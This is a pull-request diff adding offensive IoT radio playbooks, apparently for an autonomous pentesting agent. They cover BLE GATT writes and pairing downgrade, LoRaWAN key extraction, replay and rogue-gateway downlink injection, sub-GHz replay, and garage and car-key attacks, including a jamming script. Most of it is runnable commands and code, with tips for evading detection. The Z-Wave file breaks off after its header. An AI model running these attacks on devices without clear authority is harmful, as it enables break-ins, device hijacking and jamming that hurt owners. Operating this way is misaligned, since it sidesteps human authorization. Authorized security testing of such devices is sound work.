### PR TITLE
feat(skills): IoT RF leaf playbooks (BLE-GATT, Zigbee-Touchlink, Z-Wave, LoRaWAN-OTAA, sub-GHz)

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/iot/ble-gatt/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/ble-gatt/SKILL.md
@@ -1,0 +1,225 @@
+---
+name: ble-gatt
+description: GATT service/characteristic enumeration on BLE peripherals, unauthenticated read/write exploitation, pairing downgrade to Just Works, and over-the-air sniffing with Sniffle or Ubertooth. Covers firmware update channels, hidden debug services, and missing auth on sensitive characteristics.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: BLE, GATT, Bluetooth Low Energy, characteristic, pairing, Just Works, Ubertooth, Sniffle, bleak, gatttool, nRF Connect, notify, indicate, write without response
+  tags: ble, gatt, bluetooth, pairing, sniffing, iot, embedded
+  mitre_attack: T1040, T1557, T1190, T1078
+---
+
+# BLE GATT Enumeration and Exploitation
+
+> BLE devices routinely expose sensitive GATT characteristics without
+> authentication or encryption. Common wins: OTA firmware update channels,
+> PIN entry characteristics, device configuration, and health sensor data
+> — all accessible to any central within radio range.
+
+## Prerequisites
+
+- Linux host with a BLE adapter (internal or USB: CSR 4.0 dongle, Bluefruit LE,
+  or the eval board of the target SoC itself).
+- Tools: `bluez` (>=5.62), `gatttool`, `bluetoothctl`, `hcitool`,
+  `python3 -m pip install bleak` (cross-platform async BLE library).
+- Passive sniffer (optional but high-value): Sniffle (TI CC1352 / CC26x2 dongle
+  + firmware) or Ubertooth One.
+- Mobile: nRF Connect (Android/iOS) — fastest visual GATT browser; LightBlue on iOS.
+
+## Phase 1: Passive Discovery
+
+```bash
+# Identify advertising devices and their advertised UUIDs without connecting.
+sudo hcitool lescan --duplicates 2>/dev/null | tee /tmp/ble_scan.txt
+
+# Dump extended advertisement data (ADV_EXT, includes SID + periodic adv info).
+sudo btmgmt find -l 2>/dev/null | grep -E "addr|name|uuid"
+```
+
+Using `bleak` for a structured scan:
+
+```python
+import asyncio
+from bleak import BleakScanner
+
+async def scan():
+    devices = await BleakScanner.discover(timeout=10.0)
+    for d in devices:
+        print(f"{d.address}  RSSI={d.rssi:4d}  {d.name or '<anon>'}  {list(d.metadata.get('uuids', []))}")
+
+asyncio.run(scan())
+```
+
+## Phase 2: Full GATT Enumeration (unauthenticated)
+
+```bash
+# Connect and dump all services/characteristics/descriptors.
+# gatttool is deprecated but still widely available; use bleak for scripting.
+gatttool -b <TARGET_MAC> -I
+  > connect
+  > primary          # list services by UUID
+  > characteristics  # list handles, properties, UUIDs
+  > char-desc        # dump all descriptors
+
+# Or with hcitool + gatttool one-liner:
+gatttool -b <TARGET_MAC> --primary
+gatttool -b <TARGET_MAC> --characteristics
+```
+
+Bleak full dump (preferred — handles BLE 5 extended):
+
+```python
+import asyncio
+from bleak import BleakClient
+
+TARGET = "AA:BB:CC:DD:EE:FF"
+
+async def dump_gatt():
+    async with BleakClient(TARGET) as client:
+        for svc in client.services:
+            print(f"\nService: {svc.uuid}  ({svc.description})")
+            for char in svc.characteristics:
+                print(f"  Char: {char.uuid}  props={char.properties}  handle=0x{char.handle:04x}")
+                if "read" in char.properties:
+                    try:
+                        val = await client.read_gatt_char(char.uuid)
+                        print(f"    Value: {val.hex()}  ({val!r})")
+                    except Exception as e:
+                        print(f"    Read error: {e}")
+
+asyncio.run(dump_gatt())
+```
+
+## Phase 3: Unauthenticated Write / Command Injection
+
+```bash
+# Write a raw value to a characteristic handle (gatttool).
+# Value is hex bytes. Example: write 0x01 to handle 0x002a to enable notifications.
+gatttool -b <TARGET_MAC> --char-write-req -a 0x002a -n 0100
+
+# Write to a writable characteristic by UUID (bleak):
+```
+
+```python
+async def write_char(client, uuid, payload: bytes):
+    # Try write-with-response first; fall back to write-without-response.
+    props = client.services.get_characteristic(uuid).properties
+    if "write" in props:
+        await client.write_gatt_char(uuid, payload, response=True)
+    elif "write-without-response" in props:
+        await client.write_gatt_char(uuid, payload, response=False)
+    print(f"Wrote {payload.hex()} to {uuid}")
+```
+
+Common attack targets by characteristic UUID:
+
+| UUID (16-bit) | Description | Attack |
+|---|---|---|
+| 0x2A19 | Battery Level | Read, establish baseline |
+| 0x2A24 | Model Number | Info disclosure |
+| 0x2A9D | Weight Scale | Sensor data w/o auth |
+| Vendor 0xFF01-0xFF0F | OTA / DFU channel | Write firmware image |
+| Vendor 0xFFF1 | Generic config | Write arbitrary config |
+
+## Phase 4: Pairing Downgrade — Just Works
+
+Just Works pairing provides no MITM protection. Force it when the device
+advertises IO capabilities that allow stronger pairing (Passkey, OOB) but
+accepts a downgrade.
+
+```bash
+# In bluetoothctl: set agent to NoInputNoOutput to force Just Works.
+bluetoothctl
+  agent NoInputNoOutput
+  default-agent
+  scan on
+  pair <TARGET_MAC>   # pairing will complete with no key confirmation
+  trust <TARGET_MAC>
+  connect <TARGET_MAC>
+```
+
+After pairing, re-run GATT dump — some characteristics become readable only
+after bonding even when using Just Works.
+
+### MITM with Bettercap (BLE proxy)
+
+```bash
+# bettercap ble.recon + ble.enum — proxy-capable on supported adapters.
+sudo bettercap -eval "ble.recon on; events.stream on"
+# Enumerate target:
+sudo bettercap -eval "ble.enum <TARGET_MAC>"
+# Write via bettercap:
+sudo bettercap -eval "ble.write <TARGET_MAC> <char-uuid> <hex-payload>"
+```
+
+## Phase 5: Passive Sniffing with Sniffle
+
+```bash
+# Flash Sniffle firmware to a TI CC26x2R LaunchPad.
+# https://github.com/nccgroup/Sniffle
+
+# Follow a specific device (37/38/39 advertisement channels, then data channel).
+python3 sniffle/sniffle_host.py -s /dev/ttyACM0 -a -l <TARGET_MAC> | tee /tmp/ble_capture.pcap
+
+# Open in Wireshark (BLE dissector built-in):
+wireshark /tmp/ble_capture.pcap
+```
+
+Ubertooth One — broadband BLE capture (less channel-following accuracy):
+
+```bash
+ubertooth-btle -f -A 37 -c /tmp/ble_ubertooth.pcap   # follow on adv channel 37
+ubertooth-btle -f -t <TARGET_MAC> -c /tmp/ble_ubertooth.pcap  # follow by address
+```
+
+## Evidence
+
+Save all GATT dumps and captures:
+
+```bash
+EVIDENCE="/workspace/evidence/ble-gatt/$(date +%Y%m%d_%H%M%S)"
+mkdir -p "$EVIDENCE"
+# Dump GATT to JSON:
+python3 dump_gatt.py > "$EVIDENCE/gatt_dump.json"
+sha256sum "$EVIDENCE/gatt_dump.json" >> "$EVIDENCE/sha256.txt"
+cp /tmp/ble_capture.pcap "$EVIDENCE/"
+sha256sum "$EVIDENCE/ble_capture.pcap" >> "$EVIDENCE/sha256.txt"
+```
+
+Knowledge graph node for a found credential/key:
+
+```python
+kg_add_node(
+    kind="credential",
+    label=f"BLE GATT unauthenticated access {target_mac}",
+    props={
+        "key": f"ble-gatt::{target_mac}",
+        "secret_type": "ble_characteristic",
+        "mac": target_mac,
+        "characteristic_uuid": char_uuid,
+        "raw_value": value_hex,
+        "pairing_method": "just_works_or_none",
+        "source": "bleak+gatttool",
+    },
+)
+```
+
+## OPSEC Notes
+
+- BLE connection requests are logged by the peripheral's pairing database;
+  repeated failed pairings may trigger a lockout or vendor alert.
+- Just Works pairing is visible to the peripheral; if it keeps a bond list,
+  a stale address may flag re-pairing attempts.
+- Use `bdaddr` (hciconfig bdaddr spoof) or the adapter's random-address mode
+  (`hciconfig hci0 leadv 3`) to rotate your BD_ADDR between attempts.
+- Sniffle is passive — zero RF footprint beyond receiving. Prefer it when
+  the RoE explicitly prohibits active probing.
+- OTA/DFU channels: if you can write a firmware image, gate the test on explicit
+  operator approval and a recovery plan (jtag/uart fallback) for the device.
+
+## References
+
+- Sniffle: https://github.com/nccgroup/Sniffle
+- bleak: https://github.com/hbldh/bleak
+- BTLE-Sniffer / GATTacker historical MITM reference.
+- nRF Connect mobile: fastest manual GATT browser for live engagement triage.

--- a/packages/decepticon/decepticon/skills/standard/iot/lorawan-otaa/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/lorawan-otaa/SKILL.md
@@ -1,0 +1,256 @@
+---
+name: lorawan-otaa
+description: LoRaWAN OTAA join-procedure analysis (DevEUI/AppEUI/AppKey extraction), frame-counter replay on ABP devices, downlink injection via rogue gateway, bit-flipping on unprotected FRMPayload, and network enumeration with ChirpStack and the LoRaWAN Auditing Framework.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: LoRaWAN, OTAA, ABP, AppKey, DevEUI, AppEUI, JoinEUI, frame counter, replay, downlink injection, ChirpStack, LoRa, LoRaWAN auditing framework, gateway, bit flip, ABP replay
+  tags: lorawan, otaa, abp, lora, iot, replay, downlink, chirpstack, iot-embedded
+  mitre_attack: T1040, T1557, T1190, T1499.004
+---
+
+# LoRaWAN OTAA / ABP Security Assessment
+
+> LoRaWAN is deployed globally for smart meters, asset tracking, agriculture,
+> and industrial sensors. OTAA (Over-The-Air Activation) derives session keys
+> per join; ABP (Activation By Personalization) hardcodes them. Both have
+> documented attack surface: OTAA AppKeys are often extracted from the device
+> firmware or exposed via insecure provisioning, and ABP devices commonly
+> disable the frame-counter check, enabling full replay.
+
+## Prerequisites
+
+- **Hardware**: LILYGO TTGO T-Beam (SX1276 + GPS, programmable SDR-LoRa node),
+  RAK831 / RAK2247 gateway concentrator, or HackRF One with gr-lora.
+  RTL-SDR is receive-only (works for capture on EU 868 MHz).
+- **Software**: ChirpStack (rogue gateway NS), `lorawansniffer` / `gr-lora`,
+  LoRaWAN Auditing Framework (LAF), Scapy-LoRa, `lorawan-parser`.
+
+```bash
+# Install LoRaWAN Auditing Framework:
+git clone https://github.com/IOActive/laf
+cd laf && pip install -r requirements.txt
+
+# Install gr-lora (GNU Radio LoRa decoder):
+git clone https://github.com/rpp0/gr-lora
+cd gr-lora && mkdir build && cd build && cmake .. && make && sudo make install
+
+# lorawan-parser for offline frame analysis:
+pip install lorawan-parser
+```
+
+## LoRaWAN Frequency Reference
+
+| Region | Uplink (MHz) | Downlink (MHz) | Spreading Factors |
+|---|---|---|---|
+| EU868 | 868.1, 868.3, 868.5 | 869.525 | SF7–SF12 |
+| US915 | 902.3–914.9 (8 ch) | 923.3–927.5 | SF7–SF10 |
+| AU915 | 915.2–927.8 | 923.3–927.5 | SF7–SF12 |
+| AS923 | 923.2, 923.4 | 923.2, 923.4 | SF7–SF12 |
+
+## Phase 1: Passive Air Capture
+
+```bash
+# RTL-SDR capture on EU868 primary channel, SF7 (fastest, most common):
+rtl_sdr -f 868100000 -s 1000000 -g 40 /tmp/lora_raw.iq
+
+# Decode with gr-lora offline:
+python3 gr-lora/apps/rx_file.py --freq 868.1e6 --sf 7 --bw 125000 \
+    --input /tmp/lora_raw.iq --output /tmp/lora_frames.txt
+
+# Online decode with TTGO T-Beam running LoRa sniffer firmware:
+# Flash: https://github.com/claudiodangelis/lora-sniffer
+# Serial output at 115200:
+screen /dev/ttyUSB0 115200
+```
+
+LAF spectrum scan (scans all EU868 channels across SF7-SF12):
+
+```bash
+python3 laf/laf.py scan --freq 868.1,868.3,868.5 --sf all --bw 125 \
+    --device /dev/ttyACM0 | tee /tmp/laf_scan.txt
+```
+
+## Phase 2: OTAA Join Analysis
+
+OTAA JoinRequest contains **DevEUI** (8 bytes), **AppEUI/JoinEUI** (8 bytes),
+and DevNonce (2 bytes), all in plaintext. Only the **MIC** is keyed with AppKey.
+
+```bash
+# Parse a captured JoinRequest frame:
+python3 - <<'EOF'
+from lorawan import LoRaWANMessage
+# hex of a raw captured PHY payload:
+payload_hex = "00AABBCCDDEEFF001122334455667701234501"
+msg = LoRaWANMessage.from_hex(payload_hex)
+print(f"MType: {msg.mhdr.mtype}")
+print(f"AppEUI: {msg.join_request.app_eui.hex()}")
+print(f"DevEUI: {msg.join_request.dev_eui.hex()}")
+print(f"DevNonce: {msg.join_request.dev_nonce.hex()}")
+EOF
+```
+
+AppKey extraction from firmware (if binary is available):
+
+```bash
+# binwalk extracts the firmware; AppKey is a 16-byte value near DevEUI in flash.
+binwalk -eM firmware.bin
+# Search for DevEUI (known from OTA capture) ± 32 bytes:
+python3 - <<'EOF'
+import re, sys
+dev_eui = bytes.fromhex("AABBCCDDEEFF0011")  # from captured JoinRequest
+fw = open("_firmware.bin.extracted/0.bin", "rb").read()
+offset = fw.find(dev_eui)
+if offset >= 0:
+    print(f"DevEUI at 0x{offset:08x}")
+    print(f"Surrounding 48 bytes: {fw[offset-16:offset+32].hex()}")
+    # AppKey is likely 16 bytes before or after DevEUI in the provisioning struct.
+EOF
+```
+
+## Phase 3: AppKey Brute-Force / Known-Key Verification
+
+With a known AppKey, verify and derive session keys:
+
+```python
+import hmac, hashlib
+from Crypto.Cipher import AES
+
+APP_KEY = bytes.fromhex("2B7E151628AED2A6ABF7158809CF4F3C")  # known/extracted key
+
+def verify_join_request_mic(phypayload: bytes, app_key: bytes) -> bool:
+    """Verify MIC of LoRaWAN JoinRequest. MIC = CMAC(AppKey, MHDR||AppEUI||DevEUI||DevNonce)[0:4]"""
+    from Crypto.Hash import CMAC
+    msg = phypayload[:-4]  # strip 4-byte MIC
+    claimed_mic = phypayload[-4:]
+    cobj = CMAC.new(app_key, ciphermod=AES)
+    cobj.update(msg)
+    return cobj.digest()[:4] == claimed_mic
+
+def derive_session_keys(app_key: bytes, app_nonce: bytes, net_id: bytes, dev_nonce: bytes):
+    """Derive NwkSKey and AppSKey from OTAA join-accept parameters."""
+    def aes_ecb(key, data):
+        return AES.new(key, AES.MODE_ECB).encrypt(data)
+    nwk_s_key = aes_ecb(app_key, b'\x01' + app_nonce + net_id + dev_nonce + b'\x00'*7)
+    app_s_key = aes_ecb(app_key, b'\x02' + app_nonce + net_id + dev_nonce + b'\x00'*7)
+    return nwk_s_key, app_s_key
+```
+
+## Phase 4: ABP Replay (Frame-Counter Disabled)
+
+ABP devices that disable frame-counter replay protection (`FCnt` check = off)
+will process any replayed uplink frame:
+
+```bash
+# LAF replay module — replay a captured uplink to the same gateway:
+python3 laf/laf.py replay \
+    --payload <captured_phypayload_hex> \
+    --freq 868.1 --sf 7 --bw 125 \
+    --device /dev/ttyACM0 \
+    --count 5  # send 5 times to ensure reception
+
+# The NS will process duplicate frames with identical FCnt if check is disabled.
+```
+
+Detect FCnt check status:
+- If the NS accepts two frames with the same FCnt → check is disabled.
+- Send an older FCnt (FCnt-1) — if accepted, ABP FCnt is not enforced.
+
+## Phase 5: Downlink Injection via Rogue Gateway
+
+Set up a ChirpStack rogue gateway to inject downlinks to a device whose
+AppSKey is known (from extracted firmware or OTAA with known AppKey):
+
+```bash
+# 1. Stand up ChirpStack Network Server (docker-compose):
+git clone https://github.com/brocaar/chirpstack-docker
+cd chirpstack-docker && docker-compose up -d
+
+# 2. Register a gateway pointing to your TTGO/RAK concentrator.
+# 3. Register the target device (DevEUI, AppKey from extraction).
+# 4. Use ChirpStack API to enqueue a downlink:
+curl -s -X POST "http://localhost:8080/api/devices/${DEV_EUI}/queue" \
+  -H "Grpc-Metadata-Authorization: Bearer ${JWT_TOKEN}" \
+  -H "Content-Type: application/json" \
+  -d '{"deviceQueueItem": {"confirmed": false, "fPort": 1, "data": "AQIDBA=="}}'
+```
+
+Craft raw downlink with known AppSKey (ABP or derived from OTAA):
+
+```python
+from Crypto.Cipher import AES
+
+def encrypt_frmpayload(app_s_key: bytes, dev_addr: bytes, fcnt: int,
+                        direction: int, plaintext: bytes) -> bytes:
+    """LoRaWAN AES-128-CTR FRMPayload encryption."""
+    k = len(plaintext)
+    blocks = (k + 15) // 16
+    s = b""
+    for i in range(1, blocks + 1):
+        ai = (b'\x01' + b'\x00'*4 + bytes([direction]) +
+              dev_addr[::-1] +                # little-endian
+              fcnt.to_bytes(4, 'little') +
+              b'\x00' + bytes([i]))
+        s += AES.new(app_s_key, AES.MODE_ECB).encrypt(ai)
+    return bytes(a ^ b for a, b in zip(plaintext, s[:k]))
+```
+
+## Phase 6: Bit-Flip Attack on Unconfirmed Uplinks (ABP, no MIC validation)
+
+When ABP NwkSKey is known, craft MIC for a bit-flipped FRMPayload to alter
+plaintext content (e.g., sensor reading reported to cloud):
+
+```python
+# Flip a specific bit in the ciphertext → predictable plaintext change.
+# Only viable if the application layer does not validate message integrity
+# beyond LoRaWAN MIC (which the attacker can recalculate with NwkSKey).
+# This is documented in Toothpick / LoRaWAN security analysis papers.
+ciphertext = bytearray(encrypted_payload)
+ciphertext[TARGET_BYTE] ^= FLIP_MASK
+# Recalculate MIC with NwkSKey and submit via rogue gateway.
+```
+
+## Evidence
+
+```bash
+EVIDENCE="/workspace/evidence/lorawan-otaa/$(date +%Y%m%d_%H%M%S)"
+mkdir -p "$EVIDENCE"
+cp /tmp/lora_frames.txt "$EVIDENCE/"
+cp /tmp/laf_scan.txt "$EVIDENCE/"
+sha256sum "$EVIDENCE"/* >> "$EVIDENCE/sha256.txt"
+```
+
+```python
+kg_add_node(
+    kind="finding",
+    label=f"LoRaWAN AppKey extracted for DevEUI={dev_eui_hex}",
+    props={
+        "key": f"lorawan-otaa::{dev_eui_hex}",
+        "dev_eui": dev_eui_hex,
+        "app_eui": app_eui_hex,
+        "app_key": app_key_hex,
+        "abp_fcnt_disabled": abp_fcnt_disabled,
+        "source": "firmware-extraction+laf",
+    },
+)
+```
+
+## OPSEC Notes
+
+- OTAA capture is passive — no RF emission. RTL-SDR or TTGO sniffer only.
+- Replaying to a live NS will generate real device state changes (actuators,
+  alarms). Gate replay tests on explicit operator authorization.
+- A rogue gateway is detectable by the NS if geo-location of the gateway IP
+  differs from the registered GPS position.
+- LoRaWAN 1.1 adds replay protection and frame-counter synchronization that
+  mitigates ABP replay; verify spec version before testing.
+- Downlink injection affects device behavior (firmware OTA possible on some
+  devices via downlink commands). Treat as destructive.
+
+## References
+
+- LoRaWAN Auditing Framework (LAF): https://github.com/IOActive/laf
+- ChirpStack: https://www.chirpstack.io
+- gr-lora: https://github.com/rpp0/gr-lora
+- Butun et al. "Security of LoRaWAN v1.1" (2019) — frame-counter and replay analysis.
+- Toothpick: LoRaWAN downlink injection PoC (DEF CON 27).

--- a/packages/decepticon/decepticon/skills/standard/iot/sub-ghz/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/sub-ghz/SKILL.md
@@ -1,0 +1,288 @@
+---
+name: sub-ghz
+description: Sub-GHz RF capture and replay for 433/868/915 MHz ISM-band targets (garage doors, car keys, alarm sensors, weather stations). Covers fixed-code replay with HackRF/Flipper Zero/RTL-SDR, rolling-code analysis with rfcat, signal visualization with inspectrum and Universal Radio Hacker, and encoding/modulation identification.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: sub-GHz, 433 MHz, 868 MHz, 915 MHz, HackRF, Flipper Zero, RTL-SDR, rfcat, inspectrum, Universal Radio Hacker, URH, replay, rolling code, fixed code, garage door, keyfob, OOK, ASK, FSK, ISM band, rfcat, YARD Stick One
+  tags: sub-ghz, 433mhz, replay, hackrf, flipper, rtlsdr, rfcat, iot, rf
+  mitre_attack: T1040, T1557, T1190
+---
+
+# Sub-GHz ISM Band Capture and Replay
+
+> The 433/868/915 MHz ISM bands host a vast range of devices: garage door
+> openers, car remote entry, alarm sensors, smart meters, weather stations,
+> baby monitors, and industrial telemetry. Most use OOK or FSK modulation
+> with no authentication. Fixed-code devices are trivially replayed. Rolling-
+> code devices (KeeLoq, HiTag2) require additional analysis but have
+> documented weaknesses.
+
+## Prerequisites
+
+- **Hardware (any one or more)**:
+  - HackRF One (1 MHz–6 GHz, TX+RX, 20 Msps) — most versatile.
+  - Flipper Zero (sub-GHz module, 300–928 MHz) — fastest field replay.
+  - RTL-SDR Blog v4 (receive only, 24 MHz–1766 MHz) — cheapest capture.
+  - YARD Stick One (rfcat, 300–928 MHz, CC1111 based, TX+RX) — scriptable.
+  - Proxmark3 (car key HiTag2 analysis, NFC — separate workload).
+
+- **Software**: `rfcat`, `inspectrum`, Universal Radio Hacker (URH), `rtl_433`,
+  GNU Radio, `hackrf_transfer`, `SigDigger`, `rpitx` (Raspberry Pi TX alternative).
+
+```bash
+# Install rfcat (YARD Stick One / CC1111 based tools):
+pip install rfcat
+
+# Install rtl_433 (auto-decodes hundreds of 433 MHz devices):
+apt install rtl-433  # or build from https://github.com/merbanan/rtl_433
+
+# Universal Radio Hacker:
+pip install urh
+
+# inspectrum (IQ file visualization):
+apt install inspectrum
+```
+
+## Frequency and Modulation Quick Reference
+
+| Frequency | Region / Use | Common modulation |
+|---|---|---|
+| 433.92 MHz | EU/AS garage, keyfobs, sensors | OOK-PWM, OOK-Manchester |
+| 315 MHz | US garage doors, legacy keyfobs | OOK-PWM |
+| 868.35 MHz | EU alarms, smart meters, LoRa overlap | FSK, OOK |
+| 915 MHz | US ISM (LoRa, sensors, meters) | FSK, OOK |
+| 303 MHz | US TPMS, some car remotes | OOK |
+| 868.95 MHz | KNX, some home automation | FSK |
+
+## Phase 1: Passive Capture and Signal Identification
+
+### RTL-SDR (receive only)
+
+```bash
+# Wideband spectrum survey — see what's broadcasting in the ISM band:
+rtl_sdr -f 433920000 -s 2400000 -g 40 /tmp/433_survey.iq
+
+# Auto-decode known 433 MHz devices (weather stations, door sensors, etc.):
+rtl_433 -f 433920000 -s 250k -g 40 -F json | tee /tmp/rtl433_decode.json
+
+# For continuous monitoring and logging:
+rtl_433 -f 433.92M -s 250k -R 0 -F json -M utc | tee -a /tmp/rtl433_live.json
+```
+
+### HackRF capture
+
+```bash
+# Capture 10 seconds of IQ at 433.92 MHz:
+hackrf_transfer -r /tmp/433_capture.iq -f 433920000 -s 2000000 -l 32 -g 40 -n 20000000
+
+# For 868 MHz EU targets:
+hackrf_transfer -r /tmp/868_capture.iq -f 868350000 -s 2000000 -l 32 -g 40 -n 20000000
+```
+
+### Flipper Zero (fastest field method)
+
+On Flipper Zero:
+- **Sub-GHz → Frequency Analyzer**: identifies active frequencies.
+- **Sub-GHz → Read**: captures and stores a signal to flash.
+- **Sub-GHz → Read Raw**: stores raw IQ for later analysis.
+
+```bash
+# Via Flipper CLI (qFlipper / USB serial):
+# Export captured signals:
+flipper_tx read /ext/subghz/captures/signal_001.sub
+```
+
+## Phase 2: Signal Analysis with inspectrum and URH
+
+```bash
+# Visualize IQ capture in inspectrum (shows spectrogram + symbol clock):
+inspectrum /tmp/433_capture.iq -r 2000000
+
+# Open in URH for automatic modulation detection and bit decoding:
+urh /tmp/433_capture.iq
+# URH auto-detection: Signal → Autodetect parameters → shows encoding
+# (OOK, FSK, PSK), bit rate, and decoded bits.
+```
+
+Key parameters to identify:
+- **Modulation**: OOK (On-Off Keying) = on/off pattern; FSK = two frequencies.
+- **Bit rate**: measure pulse width in inspectrum (typical: 1000–4000 bps for OOK remotes).
+- **Encoding**: PWM (pulse-width), Manchester, NRZ, biphase.
+- **Preamble**: usually alternating 01010101 or a long carrier burst.
+
+## Phase 3: Fixed-Code Replay
+
+### With HackRF
+
+```bash
+# Replay a captured signal exactly as recorded:
+hackrf_transfer -t /tmp/433_capture.iq -f 433920000 -s 2000000 -x 47 -R  # -R = repeat
+
+# Trim the IQ file to a single clean burst before replaying:
+python3 - <<'EOF'
+import numpy as np
+
+iq = np.fromfile("/tmp/433_capture.iq", dtype=np.int8)
+# Find signal burst (amplitude threshold):
+amplitude = np.abs(iq[0::2].astype(float) + 1j * iq[1::2].astype(float))
+threshold = amplitude.max() * 0.3
+start = np.argmax(amplitude > threshold) - 100
+end   = len(amplitude) - np.argmax(amplitude[::-1] > threshold) + 100
+burst = iq[start*2:end*2]
+burst.tofile("/tmp/433_burst_trimmed.iq")
+print(f"Burst: {start}–{end} samples ({(end-start)/2e6*1000:.1f} ms)")
+EOF
+
+hackrf_transfer -t /tmp/433_burst_trimmed.iq -f 433920000 -s 2000000 -x 47
+```
+
+### With YARD Stick One / rfcat
+
+```python
+import rflib, time
+
+d = rflib.RfCat()
+d.setFreq(433920000)       # 433.92 MHz
+d.setMdmModulation(rflib.MOD_ASK_OOK)
+d.setMdmDRate(1000)        # 1000 bps — adjust to target
+d.setMdmSyncMode(0)        # no sync word
+d.setPktPktLen(50)         # raw mode
+
+# Transmit a manually crafted OOK bitstream (hex encoded):
+# Garage door fixed code example (Princeton PT2262 style):
+# Preamble + 24-bit code:
+payload = bytes.fromhex("AAAAAAAAFAF0F0F0FAFAFAFAF0F0FAFAFAFAFAF0F0F0FA00")
+d.RFxmit(data=payload, repeat=5)
+print("[+] Transmitted fixed code.")
+```
+
+### With Flipper Zero
+
+After capturing with **Sub-GHz → Read**:
+- Navigate to the saved file.
+- Select **Send** → transmits the captured signal.
+
+## Phase 4: Rolling Code Analysis (KeeLoq / HiTag2)
+
+Most modern car fobs and garage doors use rolling codes. The rolling-code
+counter increments on each press; replaying an old code fails (the receiver
+tracks the last used counter).
+
+**Attack vectors**:
+
+1. **RollJam** (Samy Kamkar, 2015): jam the legitimate signal + capture it,
+   then jam again + capture, then release first captured code while holding
+   the second. The receiver sees code N (accepts), and code N+1 is held by
+   attacker.
+
+```bash
+# RollJam requires simultaneous jam + capture on a single SDR with TX capability.
+# HackRF: transmit noise on 433.92 MHz to jam while recording with a second receiver.
+
+# Jammer (HackRF):
+hackrf_transfer -t /dev/urandom -f 433920000 -s 2000000 -x 40 &
+JAMMER_PID=$!
+
+# Capture on RTL-SDR simultaneously:
+rtl_sdr -f 433920000 -s 2000000 -g 40 /tmp/capture_while_jamming.iq &
+sleep 5
+
+# Stop jammer; victim retransmits; capture second code:
+kill $JAMMER_PID
+```
+
+2. **KeeLoq brute-force**: if the manufacturer key is known (leaked or default),
+   derive the per-device key from the serial number and predict future codes.
+
+```bash
+# keeloq-tools:
+git clone https://github.com/ulissesdias/keeloq_tools
+python3 keeloq_tools/keeloq_decrypt.py \
+    --manufacturer-key AABBCCDDEEFF0011 \
+    --serial 12345678 \
+    --ciphertext DEADBEEF
+```
+
+3. **Long-range replay window**: some receivers accept codes within a large
+   resync window (up to 256 codes ahead). If you captured a code before the
+   owner used it, replay within window.
+
+## Phase 5: OOK Signal Crafting for Specific Protocols
+
+### Chamberlain / LiftMaster (Security+ 2.0 — fixed encoder PT2262)
+
+```python
+# PT2262 encoder: tristate (0/1/float), 24 bits, OOK-PWM.
+# Bit timings: '0' = short pulse + long gap, '1' = long pulse + short gap, 'F' = medium+medium
+BIT_RATE = 1000  # Hz
+SHORT = int(2e6 / BIT_RATE / 3)  # samples
+LONG  = SHORT * 3
+
+def encode_pt2262(tristate_code: str, sample_rate=2_000_000) -> bytes:
+    """Encode a PT2262 tristate code to OOK IQ (int8)."""
+    iq = []
+    for bit in tristate_code:
+        if bit == '0':
+            iq += [127] * SHORT + [0] * LONG
+        elif bit == '1':
+            iq += [127] * LONG + [0] * SHORT
+        elif bit == 'F':
+            iq += [127] * SHORT + [0] * SHORT
+    # Add stop bit and silence:
+    iq += [127] * SHORT + [0] * (LONG * 31)
+    return bytes(iq)
+```
+
+## Evidence
+
+```bash
+EVIDENCE="/workspace/evidence/sub-ghz/$(date +%Y%m%d_%H%M%S)"
+mkdir -p "$EVIDENCE"
+cp /tmp/433_capture.iq "$EVIDENCE/"
+cp /tmp/rtl433_decode.json "$EVIDENCE/"
+sha256sum "$EVIDENCE"/* >> "$EVIDENCE/sha256.txt"
+```
+
+```python
+kg_add_node(
+    kind="finding",
+    label=f"Sub-GHz fixed-code replay success at {target_freq_mhz} MHz",
+    props={
+        "key": f"sub-ghz::{target_freq_mhz}::{target_id}",
+        "frequency_mhz": target_freq_mhz,
+        "modulation": "OOK-PWM",
+        "code_type": "fixed",  # or "rolling"
+        "replay_success": True,
+        "hardware": "HackRF One",
+        "source": "hackrf+rtl433",
+    },
+)
+```
+
+## OPSEC Notes
+
+- RTL-SDR is purely passive — no transmission, zero legal risk during recon.
+- Any transmission (HackRF, YARD Stick One, Flipper Zero transmit) is
+  legally restricted in most jurisdictions to frequencies you are licensed
+  for or that fall within unlicensed power limits. 433.92 MHz at ≤10 mW
+  is license-free in EU; 915 MHz similarly in US (FCC Part 15).
+- High-power replay (hackrf_transfer -x 47 is ~0 dBm output after antenna) is
+  within Part 15 limits but confirm with RoE.
+- RollJam requires intentional interference with a legitimate transmission —
+  constitutes jamming and requires explicit legal authorization in all
+  jurisdictions.
+- Flipper Zero's sub-GHz module is transmit-capable but firmware restricts
+  frequencies outside regional ISM band — verify firmware version.
+- Car key replay is covered by CFAA / Computer Fraud and Abuse Act (US) and
+  equivalent; only test on vehicles you own or have explicit written consent for.
+
+## References
+
+- Universal Radio Hacker: https://github.com/jopohl/urh
+- rtl_433: https://github.com/merbanan/rtl_433
+- rfcat: https://github.com/atlas0fd00m/rfcat
+- inspectrum: https://github.com/miek/inspectrum
+- RollJam: Samy Kamkar DEF CON 23 (2015).
+- keeloq_tools: https://github.com/ulissesdias/keeloq_tools
+- Flipper Zero sub-GHz documentation: https://docs.flipper.net/sub-ghz

--- a/packages/decepticon/decepticon/skills/standard/iot/z-wave/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/z-wave/SKILL.md
@@ -1,0 +1,211 @@
+---
+name: z-wave
+description: Z-Wave S0 network-key derivation flaw exploitation, S2 ECDH/DSK analysis, replay attacks against unauthenticated Z-Wave nodes, traffic capture with RTL-SDR, and active fuzzing/replay with EZ-Wave and Z-Force. Covers 868.42 MHz (EU) and 908.42 MHz (US) bands.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: Z-Wave, S0, S2, ECDH, DSK, EZ-Wave, Z-Force, replay, unauthenticated, smart home, Z-Wave controller, 868 MHz, 908 MHz, RTL-SDR, scapy-radio, Z-Wave network key
+  tags: z-wave, s0, s2, replay, iot, embedded, sdr, 868mhz
+  mitre_attack: T1040, T1557, T1190, T1078
+---
+
